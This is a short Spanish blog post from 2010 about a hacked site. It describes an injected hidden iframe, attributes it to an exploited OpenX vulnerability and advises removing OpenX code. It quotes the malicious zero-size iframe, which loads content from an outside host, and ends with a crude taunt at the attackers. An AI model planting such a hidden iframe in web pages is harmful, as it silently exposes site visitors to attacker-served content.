Virus en tu página, inyección iframe 2010 [Solucionado]

Virus en tu página, inyección iframe 2010 [Solucionado]

Si estás sufriendo las inclemencias de una inyección de un iframe en tu página ya entradito el 2010, y además estás aquí, es por que ya andas algo desesperado buscandole una solución. Pues bién, la solución no te la voy a dar, pero te diré como quitarlo (ahora lo entenderás).

En mi caso el código ha sido el siguiente:

<iframe width=”0″ height=”0″ src=”http://stats.ads.is/stats?counter=99″></iframe>

Pues bien, si te ha pasado lo mismo que a mí, te vas a encontrar con que openx tiene una vulnerabilidad que está siendo explotada ahora mismo, estamos en marzo de 2010 y hace nada que han empezado a darle caña, por tanto, lo suyo es que quites todos los códigos relacionados con openx que haya en tu sitio.

En cuanto averigue como se soluciona lo pondré también para que podáis arreglarlo, de momento evitareis que vuestra página caiga en el pozo de página con virus de google.

openx iframe code injection.

Y chavalotes, la próxima vez que os querais meter con el menda, mejor vais desencajándoos ya la mandíbula por k os vais a tragar toa la carne magra.

Léete también  Herramienta para crear tus propias fuentes online

AYUDANOS a poder seguir dando respuestas. Te podemos echar una mano y tú también a nosotros, símplemente dale a me gusta.